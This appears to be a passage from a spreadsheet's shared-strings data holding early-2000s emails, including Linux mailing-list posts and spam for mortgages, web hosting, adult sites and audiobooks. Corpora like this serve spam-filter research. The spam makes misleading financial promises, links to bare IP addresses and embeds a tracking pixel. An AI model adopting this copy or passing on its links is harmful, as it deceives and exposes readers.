                   &lt;td width=3D"16%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;=B3=C6=B5=F9=A1G&lt;=
 /b&gt;&lt;/font&gt;&lt;/td&gt;
                   &lt;td width=3D"84%" colspan=3D"3"&gt;&lt;font face=3D"=B7s=B2=D3=
 =A9=FA=C5=E9"&gt;&lt;!--webbot
                     bot=3D"Validation" s-data-type=3D"Number"
                     s-number-separators=3D"x." --&gt;&lt;input size=3D"47" name=
 =3D"PS2"&gt;&lt;/font&gt;=20
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"100%" colSpan=3D"4"&gt;
                     &lt;p align=3D"center"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=
 =E9"&gt;&lt;input type=3D"reset" value=3D"=AD=AB=B6=F1" name=3D"=AD=AB=B6=F11"&gt;=
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; =20
                     &lt;input type=3D"submit" value=3D"=A7=DA=B6=F1=A6n=A4F=A1=
 I50" name=3D"smart=ABH=A5=CE=A5d1"&gt; =20
                     &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/tbody&gt;
             &lt;/table&gt;
             &lt;p align=3D"center"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;&lt;fo=
 nt color=3D"#ff0000" size=3D"3"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;           =
     =20
             &lt;/font&gt;&lt;font size=3D"3"&gt;&lt;u&gt;&lt;b&gt;=A5X=B2{&lt;font color=3D"#FF0000"=
 &gt;=B6=C7=B0e=A7=B9=A6=A8&lt;/font&gt;=A1A=A7Y=AA=ED=A5=DC=A6=A8=A5\=B1H=A5X=C5o!=
 !&lt;/b&gt;&lt;/u&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;/FORM&gt;
       &lt;/tbody&gt;
     &lt;/table&gt;
     &lt;/center&gt;            =20
   &lt;/div&gt;            =20
 &lt;/form&gt;            =20
 &lt;p&gt;=A1@&lt;/p&gt;
 &lt;/SCRIPT&gt;            =20
 &lt;/SCRIPT&gt;            =20
 &lt;script language=3D"Javascript"&gt;                                         =
                                   =20
 function NoRightClick(evnt) {                                            =
                                =20
 if (navigator.appName.toUpperCase().match(/NETSCAPE/) !=3D null) {       =
                                                                     =20
 if (evnt.which =3D=3D 3){alert("=ADn=B4L=AD=AB=B5=DB=A7@=C5v=A3=AC!! ");r=
 eturn false;}}else                                                       =
                     =20
 if (event.button=3D=3D2)alert("=ADn=B4L=AD=AB=B5=DB=A7@=C5v=A3=AC!! ");} =
                                                                          =
  =20
 document.onmousedown =3D NoRightClick;                                   =
                                         =20
 &lt;/script&gt;            =20
             =20
 &lt;p&gt;               =20
             =20
 &lt;/body&gt;            =20
             =20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</si>
  <si>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ADV: Life Insurance - Pennies a day! -- FREE Quote dxyxi
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] ADSL, routers and firewalls
</t>
  </si>
  <si>
    <t xml:space="preserve">Hey there,
 Im using the standard ADSL package
 With the speedtouch usb modem
 I have a 3 machine network(it was a 4 machine till my laptop crapped out)
 Anyway
 I have a dedicated linux server running debian 3.0 with the ADSL modem
 plugged directly into it.
 I have a 5 port switch connecting the home net, all have their own 10/100 nic.
 The server runs my firewall/net gateway/etc.
 And I have some firewall rules for masquerading 
 which shares the connection over the lan just nicely.
 Once the machine is configured for adsl  (thats the tough bit)
 the network stuff is quite easy.
 I found that to be the simpelst way to go.
 -- 
 Redbrick - Dublin City University Networking Society
 Declan McMullen - Education Officer
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Are you a little behind the times?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --__________MIMEboundary__________
 Content-Type: text/plain
 Content-Transfer-Encoding: 7bit
 Are you a little behind the times? Not to worry, 123 Turnkey has your web
 building and web hosting solution, all at a a great price.
 Even better, you need no technical experience. Simply follow our simple
 steps and you've got your professional-looking website, it's as easy as
 123.
 http://r.vresp.com/?A/c4e3aadfd2
 ***************************************************************
 Get up to date now, and build a FREE WEBSITE!
 **************************************************************
 Our Revolutionary Web Site Builder Includes:
 *WebSite updater
 *Hundreds of Designer Templates
 *Free 30 day Hosting Trial
 *Easy-to-build Flash Animations
 *Content and Promotion Tools
 *$10 Web Address (your site.com)
 *And much, much, more!
 CLICK HERE AND GET YOUR NEW WEB SITE!
 http://r.vresp.com/?A/1ddc718f1e
 ______________________________________________________________________
 You have signed up with one of our network partners to receive email
 providing you with special offers that may appeal to you. If you do not
 wish to receive these offers in the future, reply to this email with
 "unsubscribe" in the subject or simply click on the following link:
 http://unsubscribe.verticalresponse.com/u.html?fdf2d323b4/aa3b97bcc2
 --__________MIMEboundary__________
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt; &lt;html&gt;
 &lt;head&gt;  &lt;title&gt;123Turnkey.COM&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;STYLE
 type=text/css&gt;.bdr {  BORDER-COLLAPSE: collapse } .ftr {  FONT-SIZE: 9pt }
 .ftr {  COLOR: Navy; } .fnt {  FONT-FAMILY: arial }  &lt;/STYLE&gt; &lt;table
 cellspacing="0" cellpadding="0" border="0" width="551" height="554"&gt; &lt;tr&gt; 
    &lt;td colspan="2"&gt;&lt;A href="http://r.vresp.com/?A/73bc136c4f"&gt;&lt;img
 src="http://www.123turnkey.com/emailpics/c_t1.jpg" width="310" height="63"
 alt="" border="0"&gt;&lt;img src="http://www.123turnkey.com/emailpics/c_t2.jpg"
 width="241" height="63" alt="" border="0"&gt;&lt;/A&gt;&lt;/td&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt;    
 &lt;td&gt;&lt;A href="http://r.vresp.com/?A/f25bad94c8"&gt;&lt;img
 src="http://www.123turnkey.com/emailpics/c_l.jpg" width="310" height="443"
 alt="" border="0"&gt;&lt;/A&gt;&lt;/td&gt;     &lt;td&gt;&lt;A
 href="http://r.vresp.com/?A/7f7443d922"&gt;&lt;img
 src="http://www.123turnkey.com/emailpics/c_r.jpg" width="241" height="443"
 alt="" border="0"&gt;&lt;/A&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt;     &lt;td colspan="2"&gt;&lt;A
 href="http://r.vresp.com/?A/837a1b6f4f"&gt;&lt;img
 src="http://www.123turnkey.com/emailpics/c_b.jpg" width="551" height="48"
 alt="" border="0"&gt;&lt;/A&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt;   &lt;td colspan="2" 
 valign="middle"&gt;&lt;br&gt;&lt;br&gt;   &lt;br&gt;   &lt;table cellspacing="0" cellpadding="0"
 border="1" width="551" height="100" bordercolor="#FFB225"&gt; &lt;tr&gt;  &lt;td&gt; 
 &lt;FONT size=1 &gt;&lt;SPAN class=ftr&gt;*If you cannot view Html, please read
 below.&lt;/FONT&gt;&lt;/SPAN&gt;&lt;br&gt;  &lt;SPAN class=ftr&gt;&lt;B&gt;  &lt;br&gt;&lt;FONT size=4&gt;Are you a
 little behind the times?&lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;  Get up to date now, and build a
 &lt;BR&gt;&lt;FONT size=2&gt;&lt;B&gt;FREE WEBSITE!&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;  &lt;B&gt;&lt;h4&gt;Our Revolutionary
 Web Site Builder Includes:&lt;/h4&gt;&lt;/B&gt;&lt;/SPAN&gt;&lt;FONT size=2 color="#000080"&gt;   
   &lt;li&gt;WebSite updater&lt;br&gt;   &lt;li&gt;Hundreds of Designer Templates&lt;br&gt;  
 &lt;li&gt;Free 30 day Hosting Trial&lt;br&gt;   &lt;li&gt;Easy-to-build Flash Animations&lt;br&gt;
   &lt;li&gt;Content and Promotion Tools&lt;br&gt;   &lt;li&gt;$10 Web Address (your
 site.com)&lt;br&gt;   &lt;li&gt;And much, much, more!&lt;br&gt;&lt;br&gt;   &lt;B&gt;CLICK HERE&lt;/B&gt;&lt;br&gt; 
  &lt;/FONT&gt;&lt;FONT size=4 color="#00CCFF"&gt;   &lt;A
 href="http://r.vresp.com/?A/731b301be8"&gt;www.123turnkey.com&lt;/A&gt;&lt;/FONT&gt;&lt;/td&gt;
 &lt;/tr&gt; &lt;/table&gt;  &lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;/body&gt; &lt;/html&gt; 
 &lt;br&gt;
                      &lt;hr color=e0e0e0&gt;
                      &lt;table border=0 cellpadding=5 cellspacing=0
 width=100%&gt;
                      &lt;tr&gt;
                            &lt;td&gt;&lt;font face="arial,verdana" size=1&gt;You have
 signed up with one of our network partners to receive email providing you
 with special offers that may appeal to you. If you do not wish to receive
 these offers in the future, reply to this email with "unsubscribe" in the
 subject or simply click on the following link: &lt;a
 href="http://unsubscribe.verticalresponse.com/u.html?fdf2d323b4/aa3b97bcc2"&gt;Unsubscribe&lt;/a&gt;&lt;/td&gt;
                      &lt;/tr&gt;
                      &lt;/table&gt;
 &lt;img src=http://i.verticalresponse.com/blank.gif?fdf2d323b4/aa3b97bcc2&gt;
 --__________MIMEboundary__________--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</si>
  <si>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A Watched Server Never Breaks
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000225.html
 Date: 2002-10-07T12:30:42-08:00
 For the past week, I've been waiting for one of my FreeBSD servers to reproduce 
 a problem we've been seeing with MySQL + LinuxThreads. This particular machine 
 is running a custom build of MySQL 4.0.4 (or MySQL 404, as I...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Rates Have Fallen Again!  6.29% Fixed Rate Mortgage 9879
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;body&gt;
 &lt;table width=3D"500" align=3D"center"&gt;
 &lt;tr&gt;
 &lt;td bgcolor=3D"#FFFF00"&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;
 &lt;font face=3D"webdings" color=3D"#0000FF" size=3D"7"&gt;
 H
 &lt;/font&gt;
 &lt;/b&gt;
 &lt;/p&gt;
 &lt;/td&gt;
 &lt;td bgcolor=3D"#FFFF00"&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;&lt;font size=3D"6" face=3D"arial" color=3D"#FF0000"&gt;6.29% Fixed Rate!!&lt;/f=
 ont&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;/td&gt;
 &lt;td bgcolor=3D"#FFFF00"&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;
 &lt;font face=3D"webdings" color=3D"#0000FF" size=3D"7"&gt;
 H
 &lt;/font&gt;
 &lt;/b&gt;
 &lt;/p&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table width=3D"475" align=3D"center"&gt;
 &lt;tr&gt;
 &lt;td align=3D"center"&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;&lt;font face=3D"arial" size=3D"6" color=3D"#FF0000"&gt;Rates Have Fallen Aga=
 in!!!&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;&lt;font face=3D"arial" size=3D"5" color=3D"#0000FF"&gt;DO NOT MISS OUT!!&lt;/fo=
 nt&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;&lt;font size=3D"4" face=3D"arial" color=3D"#000000"&gt;LET BANKS COMPETE FOR=
  YOUR
 BUSINESS!!!&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;&lt;font size=3D"4" face=3D"arial"&gt;ALL CREDIT WELCOME&lt;/font&gt;
 &lt;/p&gt;
 &lt;p align=3D"center"&gt;
 &lt;font size=3D"5" face=3D"arial" color=3D"#0000FF"&gt;
 &lt;a href=3D"http://216.126.188.162/123/mor.htm"&gt;Click Here Now For Details!=
 &lt;/a&gt;
 &lt;/p&gt;
 &lt;/font&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p align=3D"center"&gt;
 &lt;font size=3D"2" face=3D"arial" color=3D"#000000"&gt;
 ~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#&lt;br&gt;
 &lt;a href=3D"mailto:vdiuor@yahoo.com"&gt;CLICK HERE&lt;/a&gt; to unsubscribe from thi=
 s mailing list
 ~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#&lt;br&gt;
 &lt;/p&gt;
 &lt;/font&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less....               F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</si>
  <si>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steven
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] RH 7.3 and 3Com 3C905C
</t>
  </si>
  <si>
    <t xml:space="preserve">I upgraded from RH 7.2 to RH 7.3 over the weekend and now the network card
 has died, when I take a look at the network configuration tool it tells me
 the card is inactive and when I try to activate it the operation fails. I
 cant seem to find 3C905C software on the web ! Any ideas ?
 Cheers
 Liam
 ************************************************************
 E-mail Disclaimer: 
 This e-mail message and any attachments may contain information, which is
 confidential , privileged or commercially sensitive, the content of which
 may not be disclosed or used by anyone other then the named addressee.  If
 you have received this e-mail in error please notify the sender immediately
 and delete this e-mail from your system. 
 BGE does not accept any responsibility for the accuracy or completeness of
 the contents of this e-mail or its attachments or for any statements or
 contractual commitments contained in this e-mail or its attachments.  BGE
 cannot guarantee that the message or any attachment is virus free or has not
 been intercepted, corrupted or amended.  Therefore, BGE denies all liability
 for any breach of confidence, loss or damage that may be  suffered by the
 recipient and any person opening it.  
 If you are not the intended recipient, any disclosure, copying, distribution
 or any action taken or omitted to be taken in reliance on it is prohibited
 and is unlawful. 
 Thank you for your attention. 
 Visit our website www.bge.ie 
 ************************************************************
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Aug 14, 2002 at 09:22:27AM +0100, Wynne, Conor mentioned:
 &gt; When are we going to have a pint? 
  Tuesday next week. Boars Head, Capel st.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mortgage for even the worst credit                  ZWZM
</t>
  </si>
  <si>
    <t xml:space="preserve">Details
 Want to refinance?
 Fill our this quick form and immediately have mortgage
 companies compete for you business. 
 You will be offered the, absolute, BEST refinance rates 
 availible!
 Your credit doesn't matter, don't even worry about past 
 credit problems, we can refinance ANYONE!
 Let Us Put Our Expertise to Work for You!
 http://210.51.251.244/al/cgi-bin/redir.cgi?goto=ID74210
 Or Site 2
 http://61.129.81.99/al/cgi-bin/redir.cgi?goto=ID74215
 Erase
 http://210.51.251.244/al/uns/list.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">funny. i read it as green = red, as in accounting, as in fiscally
 irresponsible.  which do you think is the worse indictment - overregulation
 or overspending?  there are many (dickheads) who buy into the
 neo-conservative media's (fox's) definiton of "liberal" as "one who seeks to
 impose both."
 hannity and glove.
 best quote, wish i could remember who said it: "we tend to describe our own
 party by its ideals and our opponents' party by its reality."
 geege
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Bill
 Humphries
 Sent: Monday, September 23, 2002 10:00 PM
 To: fork@spamassassin.taint.org
 Subject: Re: Goodbye Global Warming
 On Monday, September 23, 2002, at 03:25 PM, R. A. Hettinga wrote:
 &gt;          Green = Red.
 		Capitalist = Nazi.
 		Information content of the above statements === 0.
 Meanwhile, the angels of light (tm) are having a great knock-down
 drag-out with the eldrich kings of .NET on XML-DEV.
 -- whump
 ----
 Bill Humphries &lt;bill@whump.com&gt;
 http://www.whump.com/moreLikeThis/
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Feb 06, 2002 at 04:30:18PM +0200, Harri Haataja wrote:
 &gt; install. I haven't met an openssh like that and in worst case I've had 3
 &gt; different openssl libraries (WTF can't they just bump a major version if
 &gt; it's incompatible?!?).
 So, what should I with the openssl thing?
 &gt; something) and Ive just made dummy packages (with verbose warning
 &gt; attached ;) that explicitly provide those capabilities. (or claim to,
 &gt; that is).
 How do I make such packages?
 -- 
 Peter
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Re: Csh shell scripts
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; quickie for shell scripters:
 &gt; How do I find out the time a file was created at?
  There is no canonical test, and the information is not necessarily
  available. If you check out how struct stat is defined on your system,
  you'll find that only
      time_t   st_atime;    /* Time of last access */
      time_t   st_mtime;    /* Time of last data modification */
      time_t   st_ctime;    /* Time of last file status change */
                            /* Times measured in seconds since */
                            /* 00:00:00 UTC, Jan. 1, 1970 */
  are available. File status change = i-node status change, it includes
  creation, mode change, ownership change etc., so this is what you want
  only if the file status wasn't changed since creation.
  This information is also shown by ls -lc, but parsing ls' output requires
  a bit of effort. I'd rather recommend to write a short C program to access
  the file status directly, and output the ctime directly (seconds since
  the epoch, i.e. perfect for numerical comparison).
  (Another way is to use GNU find -printf with a custom format:
   ...
             %c   File's last  status  change  time  in  the  format
                returned by the C `ctime' function.
  ...)
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: World's Biggest C*O*C*K*S....                ZEBPJ
</t>
  </si>
  <si>
    <t xml:space="preserve">Get ready for the most amazing site you will ever see!
 Click on this link NOW!
 http://64.227.161.52/archives/index2.html
 http://64.227.161.52/remove/
 sheryl-lee.m
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; First you complain about the supposed lack of
 &gt; threading in Internet Mail, and then you reply to
 &gt; one of the messages in that thread on an unrelated
 &gt; topic, messing things up for those of us with
 &gt; threading turned on?
 &gt; Even Outlook Express does threading!
 &gt; Sigh...
 I apologise for wasting your time.
 I follow this list from home, and thus use
 a yahoo account. I haven't been able to find
 a threading mechanism for this, plus the
 fact that the list can start to fill up
 my inbox after about a week of no pruning.
 This is the reason for my initial grumbling. I 
 would like to be able to follow what's going
 on without clogging up my yahoo account.
 Anyway, I should have initiated a new thread for my
 different request about S.u.S.E. CDs. I won't repeat
 my error!
 Again, my humble apologies.
 Paul...
 &gt; Nick
 p.s. accidentally emailed privately - sorry!
 ___________________________________________________________
 Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franais !
 Yahoo! Mail : http://fr.mail.yahoo.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Von Neumann's Best Friend, a bio-pet
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485759
 Date: Not supplied
 [IMG: http://www.craphound.com/images/nanodog.jpg] Matt "Warchalking" Jones has 
 come up with a bio-dog for the latest Viridian Design Contest[1], called Von 
 Neumann's Best Friend. Link[2] Discuss[3] (_Thanks, Matt[4]!_) 
 [1] http://www.viridiandesign.org/notes/301-350/00332_biofuture_robot_dog_contest.html
 [2] http://www.blackbeltjones.com/vonneumann/vonneumann.gif
 [3] http://www.quicktopic.com/boing/H/ejEDBhNuW3Nt
 [4] http://www.blackbeltjones.com/work/
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-07-30 at 19:53, Harri Haataja wrote:
 &gt; &gt; &gt; Another thing I see in debian but not in my RH boxen.
 &gt; &gt; &gt; http://falconseye.sourceforge.net/
 &gt; &gt; &gt; It's a GL(?) interface to nethack :)
 &gt; &gt; Take a look at &lt;http://cachalot.ods.org/&gt;, I have RPMs for RH7.3
 &gt; &gt; there, based on (and compatible with) the NH3.x that last appeared in
 &gt; &gt; RH7.1 powertools.  apt'able, of course :)
 &gt; 
 &gt; And Text-Iconv too, nice :)
 &gt; 
 &gt; Gpg key is nowhere in sight though even while vendors.list lists key
 &gt; id's.
 Oops, fixed (in /apt/vs.key.asc).  Thanks for pointing that out.
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free MP3 Player - Listen To Great Books!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --__________MIMEboundary__________
 Content-Type: text/plain
 Content-Transfer-Encoding: quoted-printable
 X-MIME-Autoconverted: from 8bit to quoted-printable by hq.pro-ns.net id g6PDXti4039145
 DOWNLOAD THE SUMMONS NOW =96 LISTEN TO IT ON YOUR FREE MP3 PLAYER!
 John Grisham is back doing what he does best =96 delivering the top legal
 thrillers of his generation.  The Summons is Grisham=92s first suspense
 novel in two years and now you can listen to it on your FREE MP3 player-
 only from Audible.
 Audible is the source for great audio entertainment and information.  Now
 you can forget about those expensive and clumsy audiobooks on cassette an=
 d
 CD.  Audible is digital so you can listen on any computer or AudibleReady=
 =99
 Pocket PC or MP3 player.  Listen on your commute or at the gym or anywher=
 e
 you want to get away from it all.
 SPECIAL OFFER=20
 Join one of our great, money-saving membership plans now and we will send
 you a free OTIS=99 MP3 player (a $119 value)!  Designed and manufactured =
 to
 our specifications, Audible=92s own OTIS is the best way to listen to
 Audible content.  Compact and stylish, the OTIS is sturdy, lightweight an=
 d
 smaller than the average cell phone.
 The OTIS:
 =95 Holds up to 64 MB of memory
 =95 Plays up to 17 hours of Audible content, plus Windows Media and MP3
 files
 =95 Used USB connectivity for fast audio transfer
 =95 Comes with FREE ear buds, carrying case and cassette adapter
 Enjoy The Summons by John Grisham or choose from over 20,000 other
 selections =96 bestsellers like Everything=92s Eventual by Stephen King, =
 Beach
 House by James Patterson or Up Country by Nelson DeMille, as well as dail=
 y
 versions of The Wall Street Journal and The New York Times or other
 subscriptions.
 To get your free MP3 player, CLICK HERE.
 www.audible.com/optinbig/freeotis6
 Note: Offer expires 8/31/02, while supplies last. You may have received
 this in error if you currently have more than one active Audible account.
 Audible reserves the right to cancel, change or substitute this offer at
 any time. Void where prohibited by law and subject to all federal, state
 and local laws and regulations. Some titles are not available in all
 countries.=20
 =A9 Copyright 2002 Audible, Inc., All Rights Reserved
 =20
 ______________________________________________________________________
 You are receiving this email because you requested to receive info and
 updates via email.
 To unsubscribe, reply to this email with "unsubscribe" in the subject or
 simply click on the following link:
 http://unsubscribe.verticalresponse.com/u.html?545c301b6d/aa3b97bcc2
 --__________MIMEboundary__________
 Content-Type: text/html
 Content-Transfer-Encoding: quoted-printable
 X-MIME-Autoconverted: from 8bit to quoted-printable by hq.pro-ns.net id g6PDXti4039145
 &lt;html&gt; &lt;head&gt; &lt;title&gt;Audible.com&lt;/title&gt; &lt;style type=3D"text/css"&gt; &lt;!--  =
 body
 { margin-top: 0px; margin-bottom: 0px; margin-right: 0px; margin-left:
 0px; background-color : 9ce; }   p,ul,ol,li,div,td,th,address,blockquote =
 {
 font-family: Arial, Helvetica, sans-serif; font-size: 9pt; }  .notes {
 font-size: 7pt; } --&gt; &lt;/style&gt; &lt;/head&gt; &lt;body&gt; &lt;table width=3D"675"
 border=3D"0" cellpadding=3D"0" cellspacing=3D"0" align=3D"center"&gt; &lt;tr&gt;  =
  &lt;td
 align=3D"right" colspan=3D"2"&gt;&lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_logo_9cf.=
 gif"
 width=3D"200" height=3D"28" alt=3D"" border=3D"0" hspace=3D"20" vspace=3D=
 "15"&gt;&lt;/td&gt;
 &lt;/tr&gt; &lt;tr bgcolor=3D"#0066CC"&gt;   &lt;td&gt;&lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_txt_downl=
 oad_summons.gif"
 width=3D"405" height=3D"43" alt=3D"" border=3D"0" hspace=3D"5"&gt;&lt;/td&gt;   &lt;t=
 d&gt;&lt;img
 src=3D"http://www.audible.com/clear.gif" width=3D"1" height=3D"4" alt=3D"=
 "
 border=3D"0"&gt;&lt;br&gt;   &lt;a href=3D"http://r.vresp.com/?A/ea4278f7c5"&gt;&lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_summons_t=
 op.jpg"
 width=3D"180" height=3D"60" alt=3D"" border=3D"0" hspace=3D"5"&gt;&lt;/a&gt;&lt;/td&gt; =
 &lt;/tr&gt; &lt;tr
 bgcolor=3D"#FFFFFF"&gt;   &lt;td&gt;&lt;table width=3D"90%" align=3D"center"&gt;   &lt;tr&gt; =
   =20
 &lt;td&gt;&lt;p&gt;&lt;img src=3D"http://www.audible.com/clear.gif" width=3D"1" height=3D=
 "5"
 alt=3D"" border=3D"0"&gt;&lt;br&gt;     John Grisham is back doing what he does be=
 st -
 delivering the top legal thrillers of his generation. &lt;em&gt;The Summons&lt;/em=
 &gt;
 is Grisham's first suspense novel in two years. And now you can listen to
 it on your FREE MP3 player!&lt;/p&gt;     &lt;img
 src=3D"http://www.audible.com/clear.gif" width=3D"1" height=3D"20" alt=3D=
 ""
 border=3D"0"&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;     &lt;td bgcolor=3D"#CC0000"
 align=3D"center"&gt;&lt;a href=3D"http://r.vresp.com/?A/b44d0d6eeb"&gt;&lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_txt_liste=
 n_free_player.gif"
 width=3D"333" height=3D"22" alt=3D"" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr=
 &gt;     &lt;td
 bgcolor=3D"#FFFFFF"&gt;&lt;img src=3D"http://www.audible.com/clear.gif" width=3D=
 "1"
 height=3D"10" alt=3D"" border=3D"0"&gt;&lt;br&gt;     &lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_1yr_al.gi=
 f"
 width=3D"371" height=3D"32" alt=3D"" border=3D"0"&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;/table=
 &gt;&lt;/td&gt; =20
 &lt;td&gt;&lt;a href=3D"http://r.vresp.com/?A/3c4d68d5d0"&gt;&lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_summons_b=
 ottom.jpg"
 width=3D"180" height=3D"182" alt=3D"" border=3D"0" hspace=3D"5"&gt;&lt;/a&gt;&lt;/td&gt;=
  &lt;/tr&gt; &lt;tr
 bgcolor=3D"#FFFFFF"&gt;   &lt;td colspan=3D"2"&gt;&lt;table width=3D"655"&gt;   &lt;tr&gt;    =
  &lt;td
 width=3D"200"&gt;&lt;a href=3D"http://r.vresp.com/?A/b97faf6da2"&gt;&lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_otis_valu=
 e.jpg"
 width=3D"155" height=3D"257" alt=3D"" border=3D"0" hspace=3D"10"&gt;&lt;/a&gt;&lt;/td=
 &gt;   =20
 &lt;td&gt;&lt;p&gt;Designed and manufactured to our specifications, Audible=92s own
 Otis&amp;#153; mobile audio player is the best way to listen to Audible.
 Compact and stylish, the Otis is sturdy, lightweight, and smaller than th=
 e
 average cell phone.&lt;/p&gt;     &lt;ul&gt;       &lt;li&gt;64 MB of memory&lt;/li&gt;     =20
 &lt;li&gt;Plays up to 17 hours of Audible content formats 2 and 3    plus
 Windows Media and MP3 files&lt;/li&gt;       &lt;li&gt;USB connectivity for fast audi=
 o
 transfer&lt;/li&gt;       &lt;li&gt;Comes with ear buds, carrying case, and cassette
 adapter&lt;/li&gt;     &lt;/ul&gt;     &lt;p&gt;&lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_cnet.gif"
 width=3D"152" height=3D"34" alt=3D"" border=3D"0"&gt;&lt;img
 src=3D"http://www.audible.com/clear.gif" width=3D"10" height=3D"1" alt=3D=
 ""
 border=3D"0"&gt;&lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_pcmag.gif=
 "
 width=3D"188" height=3D"40" alt=3D"" border=3D"0"&gt;&lt;/p&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;/t=
 able&gt; =20
 &lt;img src=3D"http://www.audible.com/clear.gif" width=3D"1" height=3D"10" a=
 lt=3D""
 border=3D"0"&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr bgcolor=3D"#EEEEEE"&gt;   &lt;td colspan=3D"2"&gt;&lt;im=
 g
 src=3D"http://www.audible.com/clear.gif" width=3D"1" height=3D"10" alt=3D=
 ""
